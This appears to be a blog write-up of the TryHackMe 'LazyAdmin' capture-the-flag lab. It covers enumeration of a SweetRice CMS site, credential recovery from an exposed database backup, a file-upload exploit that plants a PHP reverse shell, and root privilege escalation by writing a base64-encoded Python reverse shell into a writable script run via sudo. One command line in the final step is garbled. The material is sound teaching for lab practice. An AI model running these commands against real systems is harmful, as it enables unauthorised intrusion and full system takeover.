This page looks best with JavaScript enabled

TryHackMe: LazyAdmin

 ·  ☕ 5 min read

Enumeration

Started with a port scan:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.66.23 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.66.23
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 10:53 UTC
Nmap scan report for 10.10.66.23
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

It has port 80 open so I did a directory bruteforce,and after a few seconds got the directory /content:

root@docker-desktop:~# wfuzz -L --hc 404 -c -z file,/root/shared/wordlists/web_dictionaries/directory-list-2.3-medium.txt -u http://10.10.66.23/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.66.23/FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000001:   200        375 L    968 W    11321 Ch    "# directory-list-2.3-medium.txt"
000000002:   200        375 L    968 W    11321 Ch    "#"
000000003:   200        375 L    968 W    11321 Ch    "# Copyright 2007 James Fisher"
000000004:   200        375 L    968 W    11321 Ch    "#"
000000005:   200        375 L    968 W    11321 Ch    "# This work is licensed under the Creative Commons"
000000006:   200        375 L    968 W    11321 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000007:   200        375 L    968 W    11321 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000008:   200        375 L    968 W    11321 Ch    "# or send a letter to Creative Commons, 171 Second Street,"
000000009:   200        375 L    968 W    11321 Ch    "# Suite 300, San Francisco, California, 94105, USA."
000000010:   200        375 L    968 W    11321 Ch    "#"
000000011:   200        375 L    968 W    11321 Ch    "# Priority ordered case sensative list, where entries were found"
000000012:   200        375 L    968 W    11321 Ch    "# on atleast 2 different hosts"
000000013:   200        375 L    968 W    11321 Ch    "#"
000000014:   200        375 L    968 W    11321 Ch    ""
000000075:   200        35 L     151 W    2197 Ch     "content"

The landing page of that directory lets us know that is using a CMS:
Landing page

Then searched vulnerabilities for that CMS using searchsploit:

root@docker-desktop:~# searchsploit sweetrice
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                 | php/webapps/14184.txt
SweetRice 0.5.3 - Remote File Inclusion                                               | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                            | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                             | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                               | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                   | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                          | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                     | php/webapps/40700.html
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a backup disclosure, all we have to do is go to http://ip/content/inc/mysql_backup and download the backup:

curl http://10.10.66.23/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql -o backup.sql

Inside the backup we get some credentials:

root@docker-desktop:~/Documents/lazyadmin# cat backup.sql | grep pass
  14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

The password is hashed so we have to crack it and the user is manager.

Afterwards analized the CMS directory structure using its github repository but didn’t find an easy way to upload and execute php from the web:
CMS Structure

Intrusion

As shown above from searchploit there is an arbitrary file upload, so used a php reverse shell:


root@docker-desktop:~/Documents/lazyadmin# searchsploit -m 40716
root@docker-desktop:~/Documents/lazyadmin# python3 40716.py

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

Enter The Target URL(Example : localhost.com) : 10.10.66.23/content
Enter Username : manager
Enter Password : Password123
Enter FileName (Example:.htaccess,shell.php5,index.html) : php-reverse-shell.php5
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.66.23/content/attachment/php-reverse-shell.php5

Once the reverse shell is uploaded, in one terminal listened for connections with netcat:

root@docker-desktop:~/Documents/lazyadmin# nc -lvp 443

And in other terminal executed the reverse shell:

root@docker-desktop:~/Documents/lazyadmin# curl http://10.10.66.23/content/attachment/php-reverse-shell.php5

Once inside upgraded to an interactive shell:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$ export TERM=xterm

Then got the user flag:

www-data@THM-Chal:/var/www$ find / -name 'user.txt' 2>/dev/null
/home/itguy/user.txt
www-data@THM-Chal:/var/www$ cat /home/itguy/user.txt
THM{63e5bce9***************6f1ac8a07}

Privesc

Firstly checked for sudo permissions. Apparently we can execute a perl script as root:

www-data@THM-Chal:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/$ cat /home/itguy/backup.pl
cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
www-data@THM-Chal:/$ ls -lisha /etc/copy.sh
ls -lisha /etc/copy.sh
1050508 4.0K -rw-r--rwx 1 root root 347 Jun 15 15:48 /etc/copy.sh

All we have to do at this stage is to add a reverse shell to /etc/copy.sh.
I encoded a python reverse shell as base64:

root@docker-desktop:~/Documents/lazyadmin# base64 -w0 <<'EOF'
python3 -c 'import socket,subprocess,os; 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); 
s.connect(("<your ip>",444)); os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); 
p=subprocess.call(["/bin/sh","-i"]);'
EOF

Then listened for open connections on port 444:

root@docker-desktop:~/Documents/lazyadmin# nc -lvp 444

Finally add it to /etc/copy.sh and execute it with sudo:

www-data@THM-Chal:/$ echo 'echo "base64 payload" | base64 -d | bash -s ' > /etc/copy.sh
sKFsiL2Jpbi9zaCIsIi1pIl0pOycK" | base64 -d | bash -s ' > /etc/copy.sh
www-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl

Now we are root:

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{6637f41***************775124699f}
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover